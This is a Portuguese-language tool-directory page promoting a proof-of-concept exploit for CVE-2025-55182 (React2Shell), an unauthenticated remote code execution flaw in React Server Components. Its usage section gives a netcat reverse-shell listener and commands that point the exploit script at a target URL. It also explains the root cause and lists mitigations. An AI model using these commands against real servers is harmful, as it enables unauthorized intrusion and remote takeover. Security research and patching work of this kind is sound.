Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-React2Shell-RCE — Exploit de prova de conceito para CVE-2025-55182 (React2Shell), uma vulnerabilidade de execução remota de código não autenticada em React Server Components por meio de payloads elaborados do protocolo Flight. | Kitploit
Ferramentas/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Exploit de prova de conceito para CVE-2025-55182 (React2Shell), uma vulnerabilidade de execução remota de código não autenticada em React Server Components por meio de payloads elaborados do protocolo Flight.

Ver Repositório
13há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (RCE não autenticado em React Server Components)

CVE-2025-55182, também conhecida como React2Shell, é uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada que afeta os pacotes React Server Components (versões 19.0, 19.1.0, 19.1.1 e 19.2.0).

Esta vulnerabilidade pode permitir que atacantes obtenham execução arbitrária de código em servidores vulneráveis por meio de uma única requisição HTTP manipulada, sem exigir autenticação.


Visão Geral

React Server Components usam o protocolo Flight para serializar e desserializar dados de componentes trocados entre cliente e servidor.

Validação inadequada durante esse processo de desserialização pode permitir que payloads especialmente manipulados alterem estruturas internas de objetos e alcancem primitivas perigosas de execução JavaScript.


Causa Raiz

A vulnerabilidade origina-se de validação insuficiente durante a desserialização de payloads do protocolo Flight de React Server Components (RSC).

Payloads especialmente manipulados podem:

  • manipular estruturas internas de objetos
  • percorrer a cadeia de protótipos do JavaScript
  • acessar construtores JavaScript perigosos
  • alcançar execução arbitrária de código no servidor

Como Funciona

  1. O exploit envia uma requisição multipart/form-data especialmente manipulada
  2. O servidor interpreta a requisição como um payload React Flight
  3. O chunk malicioso é processado durante a desserialização
  4. O payload:
  • manipula o fluxo interno de execução
  • alcança primitivas perigosas de execução JavaScript
  • executa código arbitrário
  1. O atacante obtém execução remota de código no servidor de destino

🚀 Uso

Inicie um listener na sua máquina:

root@kitploit:~
nc -lvnp 4444

Execute o exploit:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Requisitos

  • Versões vulneráveis do React / Next.js
  • React Server Components habilitados no lado do servidor
  • Endpoint RSC acessível

Mitigação

Para mitigar esta vulnerabilidade:

  • Atualize o React para a versão corrigida mais recente disponível
  • Aplique as correções disponíveis do framework
  • Monitore e bloqueie requisições RSC suspeitas

Referências

- OffSec – Análise de Exploração da CVE-2025-55182

- Microsoft Security – Defendendo-se Contra o React2Shell

- Aviso de Segurança do React (Divulgação Oficial)


Aviso Legal

Este projeto é fornecido estritamente para:

  • Pesquisa de segurança
  • Fins educacionais
  • Avaliações de segurança autorizadas e testes de penetração

Os autores não assumem nenhuma responsabilidade por uso indevido ou danos causados por este material. Os usuários são os únicos responsáveis pelo cumprimento de todas as leis e regulamentos aplicáveis.

Baixar ferramenta